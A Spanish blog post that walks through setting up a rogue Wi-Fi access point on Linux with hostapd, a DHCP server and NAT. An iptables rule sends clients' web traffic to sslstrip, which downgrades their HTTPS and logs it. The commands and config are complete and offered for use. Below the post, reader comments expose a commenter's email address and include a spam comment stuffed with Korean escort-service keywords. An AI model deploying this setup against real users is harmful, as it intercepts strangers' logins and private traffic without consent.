Siempre he tenido ganas de montar un AP en una máquina Linux, pero vamos a ir un poco mas allá y vamos a instalar bind, dhcp3-server y sslstrip para que nuestro AP dé un poco mas de juego.Mediante Bind podremos resolver nosotros mismos las direcciones ip de nuestros clientes, con el servidor DHCP repartiremos ips y con SSLStrip podremos hacer de intermediarios en las peticiones HTTPS realizando las peticiones HTTPS al servidor final y HTTP a nuestros clientes, de este modo el tráfico solo viajará cifrado desde el AP al servidor final.
Instalamos el software necesario:
apt-get install bind9 dhcp3-server hostapd aircrack-ng
Necesitamos una interfaz en modo monitor(mon0), utilizaremos el direccionamiento 192.168.2.X:
airmon-ng start wlan0
ifconfig mon0 192.168.2.1
Configuramos hostapd con la intefaz de red y el SSID:
vi /etc/hostapd/hostapd.conf
interface=mon0
driver=nl80211
ssid=LA QUE MONTA ESTA
hw_mode=g
channel=1
Arrancamos hostapd con la configuración anterior:
/usr/sbin/hostapd /etc/hostapd/hostapd.conf
Configuramos un servidor DHCP para que los clientes que se conecten a nuestro AP reciban una dirección ip:
vi /etc/dhcp/dhcpd.conf
subnet 192.168.2.0 netmask 255.255.255.0 {
range 192.168.2.2 192.168.2.4;
option domain-name-servers 8.8.8.8;
option routers 192.168.2.1;
}
Habilitamos el enmascaramiento(NAT)
iptables -t nat -A POSTROUTING -s 192.168.2.0/24 -d 0.0.0.0/0 -j MASQUERADE
Y ahora obramos el milagro, las peticiones dirigidas al puerto 80 la enviamos a localhost 10000:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Ahora arrancamos sslstrip, este se mantendrá a la espera de peticiones en el puerto 10000:
cd /usr/src
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
tar xvzf sslstrip-0.9.tar.gz
cd sslstrip-0.9
python sslstrip.py -w salida
Dejamos tail monitorizando el fichero de salida de SSLStrip:
tail -f /usr/src/sslstrip-0.9/salida
Entradas
4 comentarios:
tngo unas dudas podrias decirm n q lineas debo editar cada cosa, n caso del ssid dbo poner el nombr de la rd a la cual voy a conctar???? y n l caso dl driver debo ponr l d mi tarjeta q es ath9k ??c gracias de antemano .. tu blog ayuda a muchos q recien empezamos en l maravilloso mundo del linux
Hola dilio
Creo que estas algo confundido, el SSID será de la ed que quieres que publique tu AP, la idea es dejar que la gente se conecte a nuestro AP y darles acceso a Internet a través de otra conexión ya sea cableada o Wifi, por este motivo hacemos NAT de la red del rango 192.168.2.0/24.
En cuanto al driver yo también tengo una atheros que utiliza el driver ath9k y así me funciona correctamente.
Si no entiendes bien el tema del NAT enviame un e-mail y te adjunto un esquema para que lo veas mas claro.
Un saludo.
ok ya m qdo algo mas claro .. mi e-mail s dilio.s.cruz@gmail.com si m nvias algo m podria qdar mas claro dsd ya gracias ... saludos
El Yucateco Casinos & Hotels - MapYRO
Find the best 의왕 출장샵 El Yucateco casinos & 안동 출장마사지 hotels in Las Vegas. MapYRO Hotels. Address, 수원 출장안마 3131 South Las 김포 출장샵 Vegas Blvd. S, Las Vegas, 포천 출장샵 NV 89109, US.
Publicar un comentario